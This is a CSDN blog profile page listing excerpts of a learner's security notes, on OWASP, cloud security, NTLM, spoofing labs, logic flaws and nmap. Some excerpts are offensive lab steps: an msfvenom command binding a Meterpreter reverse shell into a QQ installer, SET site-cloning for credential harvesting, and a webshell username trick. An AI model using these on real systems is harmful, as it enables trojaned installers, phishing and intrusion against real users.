ihszg
码龄5年
关注
提问 私信
  • 博客:612,637
    社区:8
    动态:24
    612,669
    总访问量
  • 129
    原创
  • 1,677,463
    排名
  • 632
    粉丝

个人简介:四舍五入两米高,取整去余一百斤,平时找bug挖漏洞,闲时与学妹吟诗作赋,乏时以太极养精蓄锐。偶尔也为部分游戏的Beta测试出力。这就是我,展现在人前的我

IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:广东省
  • 加入CSDN时间: 2019-09-19
博客简介:

这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断

博客描述:
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
查看详细资料
个人成就
  • 获得1,953次点赞
  • 内容获得603次评论
  • 获得3,119次收藏
  • 代码片获得2,879次分享
创作历程
  • 1篇
    2023年
  • 1篇
    2021年
  • 131篇
    2020年
成就勋章
TA的专栏
  • 懒分类
    14篇
  • mysql
    17篇
  • 小玩意
    6篇
  • Windows
    10篇
  • 活动
    2篇
  • 阿里云云安全助理工程师认证(ACA)
    8篇
  • web渗透
    12篇
  • xss
    8篇
  • 逻辑漏洞
    3篇
  • php
    4篇
  • Linux
    39篇
  • upload-labs
    3篇
  • python
    2篇
  • Apache
    9篇
  • nginx
    5篇
兴趣领域 设置
  • 网络空间安全
    系统安全web安全安全架构
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

174人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

跋20230325

博文都是笔者在学习过程中所记录的笔记,一些结论只代表笔者当时写这篇文章时的想法,不能保证百分百正确。加上现在的岗位和技术越来越不相关,以后大概率也不会登录csdn来查找资料。如果您发现了有误的地方,可以在评论区指出来,给其他学习的人提个醒,有问题也可以问那些近期活跃的博主。很久没有登录csdn,突然上号一次发现n多的评论和私信,时间跨度从2021年到2023年。
原创
发布博客 2023.03.25 ·
217 阅读 ·
0 点赞 ·
1 评论 ·
0 收藏

2020年总结

已经2021年了。对2020年,有一些话想说,但不知从何说起。前言很小就对‘黑客’感兴趣,于是大学时我的专业是软件工程——填志愿时根本不知道还有网络安全、信息安全这种专业,所以选择了一些类似软件工程这种听起来就和电脑有关的专业。浑浑噩噩过了一年多。大二下学期,突然接触到了CTF比赛,然后久违的‘黑客梦’又出来了。于是决定“洗心革面,重新做人”,开始找视频,找网站,找文章开始自学。二月2020年2月,得到消息可能要在家学习两个月。两个月,这么长一段时间让我自学,当初心里是害怕的,因为我知道自己的自
原创
发布博客 2021.01.12 ·
5124 阅读 ·
98 点赞 ·
9 评论 ·
4 收藏

OWASP Top 10

目录什么是OWASP?TOP 101.注入说明产生情况危害防范2.失效身份验证和会话管理说明产生情况危害防范3.敏感信息泄露说明产生情况危害防范4.XML外部实体注入攻击(XXE)说明产生情况危害防范5.存取控制中断说明产生情况危害防范6.安全性错误配置说明产生情况危害防范7.跨站脚本攻击(XSS)说明产生情况危害防范8.不安全的反序列化说明产生情况危害防范9.使用具有已知漏洞的组件说明产生情况危害防范10.日志记录和监控不足说明产生情况危害防范什么是OWASP?它的全称是 Open Web Appli
原创
发布博客 2020.10.15 ·
3025 阅读 ·
19 点赞 ·
6 评论 ·
3 收藏

阿里云云安全理工程师认证 部分题目 ACA

(笔者还没开始考,题目来源于百度)1.如果企业云上的架构选择的是All in one的部署方式,以下哪种安全注意事项是不需要考虑的?A .云实例之间的数据传输安全B .登陆安全C .应用访问攻击D .网络攻击风险2.口令暴力破解主要是以哪些协议为主来发动攻击的?(正确答案的数量:2个)A .HTTPB .HTTPSC .SSHD .RDP3.为了提升云上账号的安全性,建议用户在管理云服务时遵循一些基本的原则,以下哪个选项不属于建议的指导原则?A .匿名登录B .登录验证C .
原创
发布博客 2020.10.05 ·
3708 阅读 ·
25 点赞 ·
4 评论 ·
20 收藏

云上安全综合管理

目录课程目标1.安全管理概述安全管理的重要性云上安全管理的六大措施阿里云上安全管理三字经云上安全管理的注意事项云上安全远程管理的最佳实践:VPN+堡垒机阿里云的堡垒机服务2.阿里云上监控服务云监控的使用场景云监控的价值态势感知态势感知的使用场景态势感知的价值3.云上安全监控和管理的实践读懂常见的风险报警自定义的报警规则用好监控大屏课程目标1.安全管理概述安全管理的重要性云上安全管理的六大措施阿里云上安全管理三字经云上安全管理的注意事项云上安全远程管理的最佳实践:VPN+堡垒机阿里
原创
发布博客 2020.10.05 ·
1692 阅读 ·
20 点赞 ·
0 评论 ·
3 收藏

云上应用安全

目录课程介绍1.WEB应用安全概述web应用安全问题示例web应用安全问题OWASP十大安全漏洞列表(2017年)web组成部分及web安全分类应用安全防护方法应用安全防护工具2.通过阿里云WAF保护应用安全什么是阿里云WAF?阿里云WAF的产品功能阿里云WAF的竞争优势1.资源能力2.数据模型阿里云WAF工作原理阿里云WAF应用防火墙安全监测流程阿里云WAF接入方法WAF的不同版本3.SQL注入及防护什么是SQL注入攻击?SQL注入攻击的现象SQL注入的过程SQL注入产生的原因SQL注入攻击语句举例SQL
原创
发布博客 2020.10.05 ·
2991 阅读 ·
18 点赞 ·
2 评论 ·
3 收藏

云上数据安全

目录课程介绍1.数据安全概述常见的数据安全问题数据本身及数据防护的安全阿里云的数据安全防护2.数据备份、恢复和容灾常见的不同级别的备份方法云服务器ECS快照云数据库RDS备份与恢复云数据库RDS数据导入、导出云数据库RDS主备实例、灾备实例云储存OSS多副本&异地备份3.数据加密常见加密算法应用1.对称加密算法2.非对称加密算法3.哈希算法如何选择加密算法和秘钥云数据库加密存储——TDE透明数据加密云存储OSS加密存储——客户端加密保护数据云存储OSS数据完整性验证阿里云加密服务4.数据传输安全数据
原创
发布博客 2020.10.05 ·
3344 阅读 ·
17 点赞 ·
6 评论 ·
24 收藏

云上网络安全

目录课程目标1.网络安全概述TCP/IP协议网络通信的五元组常见的网络安全问题各种网络攻击安全责任分担模型2.网络防火墙的使用安全组介绍安全组功能创建安全组配置规则安全组应用3.安全专有网络VPCVPC原理VPC与经典网络VPC功能1、自由可控的网络2、公网出入弹性公网IP与NAT网关的对比3、私网互联4.DDoS攻击介绍与防护措施5.如何用好阿里云的基础DDoS防护6.通过高防IP抵御大规模DDoS攻击课程目标1.网络安全概述TCP/IP协议网络通信的五元组源IP、源端口、协议、目标IP、.
原创
发布博客 2020.10.05 ·
3889 阅读 ·
18 点赞 ·
2 评论 ·
6 收藏

windows 认证机制

Windwos密码hash早期SMB协议在网络上传输明文口令,后来出现"LAN Manager Challenge/Response"验证机制,简称LM,由于容易被破解,微软提出了windows NT挑战/响应机制,称之为NTLM。现在已经有了更新的NTLM v2以及Kerberos验证体系。windows加密过的密码口令,我们称之为hash,windows的系统密码hash默认情况下一般有两部分组成:LM-hash,NTLM-hash 。NTLM hash在windows系统中比较常见的是从系统导出
原创
发布博客 2020.10.09 ·
4941 阅读 ·
42 点赞 ·
5 评论 ·
9 收藏

协议攻击(一)

目录1.IP源地址欺骗攻击(dos攻击)原理:实验环境步骤1.2 dos攻击2.ARP欺骗中间人攻击原理实验环境步骤1.IP源地址欺骗攻击(dos攻击)原理:客户端(kali)基于tcp第一次握手,给服务器端(centos)发送了大量标记位为SYN的包。服务器端收到来自客户端的syn包后,对源ip返回标记位为syn_ack的包,这是第二次握手。由于源ip是伪造的,所以返回的syn_ack包发送不到正确的地方,更不要说得到回应了。所以服务器端一直是SYN-RCVD阶段。实验环境靶机:cento
原创
发布博客 2020.10.02 ·
6809 阅读 ·
44 点赞 ·
5 评论 ·
163 收藏

内网渗透

目录什么是外网渗透什么是内网渗透域工作组什么是外网渗透外网更侧重于找漏洞寻找突破口举个简单的例子:把渗透测试当做去偷某家超市的某个商品。外网渗透就是突破超市的大门,进入超市。想要进入超市,这个时候我们要寻找一下超市防守不到位的地方:比如是不是窗户没关,保安是不是半夜十二点就会开始划水,大门是不是没锁……综合素质很强的白帽会收集这些“漏洞”,综合多方因素,利用天时地利人和,突破限制,闯入“内网”。所以,外网渗透阶段,考验的是白帽综合能力,想要进入内网是一个很难的过程。什么是内网渗透而内网更侧重
原创
发布博客 2020.10.04 ·
10119 阅读 ·
52 点赞 ·
16 评论 ·
166 收藏

代码审计

定向功能分析法1.程序初始安装2.站点信息泄露3.文件上传4.文件管理5.登录认证6.数据库备份恢复注册一个用户,用户名是个一句话木马,然后将数据库导出备份,用户名7.找回密码8.验证码找到加密的密码,偏移量,生成同样的token。或者找到cookie的生成规律,然后cookie登录...
原创
发布博客 2020.10.04 ·
6862 阅读 ·
37 点赞 ·
6 评论 ·
93 收藏

珍惜数据,远离钓鱼

首先,进入kali输入:setoolkit选择1,社会工程攻击下一步,选择2,网站攻击载体接下来还是选择3,凭证收割机然后,又是选择2,站点克隆器然后回车,输入你想克隆的网站,但是注意,只能克隆http的,不能克隆https的,去掉s就行了...
原创
发布博客 2020.09.17 ·
5799 阅读 ·
66 点赞 ·
6 评论 ·
113 收藏

msf之木马程序

捆绑木马这里使用的是Kali linux虚拟机攻击机ip是192.168.0.108靶机ip是192.168.177.134生成木马文件首先上传一个正常的安装包到kali里面我这里下了一个QQ把它上传到了root/dy/路径下然后开始捆绑msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 -f exe -x /root/dy/PCQQ2020.exe -o /root/dy/QQ.exe-p:指定后面的pa
原创
发布博客 2020.09.15 ·
12056 阅读 ·
95 点赞 ·
31 评论 ·
474 收藏

社会工程学

目录什么是社会工程学?基础信息怎么拿到基础信息?(常见的社会工程学攻击)1.直接索取 (Direct Approach) — 直接向目标人员索取所需信息2.个人冒充3.反向社会工程4.邮件利用5.钓鱼技术 (Phishing) — 模仿合法站点的非法站点6.域欺骗技术 (Pharming)7.非交互式技术8.多学科交叉技术技术强化社会工程学是黑客米特尼克悔改后在《欺骗的艺术》中所提出的,是一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段。什么是社会工程学?在
原创
发布博客 2020.09.13 ·
16005 阅读 ·
77 点赞 ·
7 评论 ·
256 收藏

免费下论文及查重投稿的10来个方法

目录1.超星期刊2.库问搜索3. 全国图书馆参考咨询联盟4.百度学术5.爱学术6.谷歌学术7.OA图书馆8.Idata9.中国国家图书馆10.湖南图书馆——五颗星眨眼间就快毕业了,是时候准备写论文了。但是随着校园网的涨价,进知网也成了件奢侈的事。或许几年后,不知知网会成为正常的操作。好了,废话少说,开始白嫖论文之路以下都是在火狐浏览器中演示的,如果是360、IE、谷歌浏览器,可能会有些许不同操作。写个爬虫——这是不可能的,面向监狱编程可不是说笑的。1.超星期刊如果你刷过超星尔雅通识课,而且学生
原创
发布博客 2020.09.09 ·
12239 阅读 ·
117 点赞 ·
25 评论 ·
47 收藏

逻辑漏洞之无密码登录(vlcms)

目录漏洞原理演示逻辑图靶场cms下载漏洞原理无密码登录,说到这个,大家可能想到的是下面这几种方法。一种是用第三方账户,比如使用QQ登录,使用微博登录。一种就是邮箱登录,比如只要输入email地址,然后网站就会给你的邮箱发一条邮件,邮件里有条链接,你只要点击链接就能登录。还有就是扫码登录,比如手机QQ扫码登录电脑QQ。……但是这些并不是本文所介绍的,因为这些是正常的无密码登录。所谓无密码登录漏洞,我觉得应该是:原本需要输入账号、密码并验证其符合要求才能正常登录的地方,因为程序的不严谨,造成不输
原创
发布博客 2020.09.06 ·
4015 阅读 ·
31 点赞 ·
3 评论 ·
14 收藏

逻辑漏洞之密码找回漏洞(semcms)

目录什么是密码找回漏洞一般流程可能产生该漏洞的情况脑洞图1.用户凭证暴力破解2.返回凭证3.邮箱弱token4.用户凭证有效性5.重新绑定6.服务器验证7.用户身份验证8.找回步骤9.本地验证10.注入11.Token生成12.注册覆盖13.session覆盖演示暴破验证码找回密码更改id号修改admin密码靶场cms下载什么是密码找回漏洞利用漏洞修改他人帐号密码,甚至修改管理员的密码。一般流程1 首先尝试正常找回密码流程,选择不同的找回方式,记录所有数据包2 分析数据包,找到敏感部分3
原创
发布博客 2020.09.06 ·
6956 阅读 ·
39 点赞 ·
7 评论 ·
61 收藏

逻辑漏洞之越权、支付漏洞

目录逻辑漏洞Web安全渗透三大核心方向输入输出登录体系、权限认证业务逻辑漏洞分类1、登录体系安全暴力破解cookie安全加密测试登录验证绕过任意注册2、业务一致性安全手机号篡改邮箱和用户名更改订单ID更改商品编号更改用户ID篡改流程顺序3、业务数据篡改金额数据篡改商品数量篡改最大数限制突破金额&优惠组合修改4、密码找回漏洞分析数据包,定位敏感信息分析找回机制修改数据包验证任意密码找回5、验证码突破暴力破解时间、次数突破回显测试验证码绕过测试验证检验机制猜解6、会话权限安全未授权访问水平&垂直
原创
发布博客 2020.09.06 ·
8058 阅读 ·
44 点赞 ·
4 评论 ·
116 收藏

nmap

目录nmap端口状态解析nmap-D 伪造ip-g 伪造端口-A 详细扫描-sVscan 仔细扫描-iL-iroracle-sid-brute.nsenmap端口状态解析open : 应用程序在该端口接收 TCP 连接或者 UDP 报文。 closed :关闭的端口对于nmap也是可访问的, 它接收nmap探测报文并作出响应。但没有应用程序在其上监听。filtered :由于包过滤阻止探测报文到达端口,nmap无法确定该端口是否开放。过滤可能来自专业的防火墙设备,路由规则 或者主机上的软件防火墙
原创
发布博客 2020.09.19 ·
1789 阅读 ·
26 点赞 ·
1 评论 ·
64 收藏
加载更多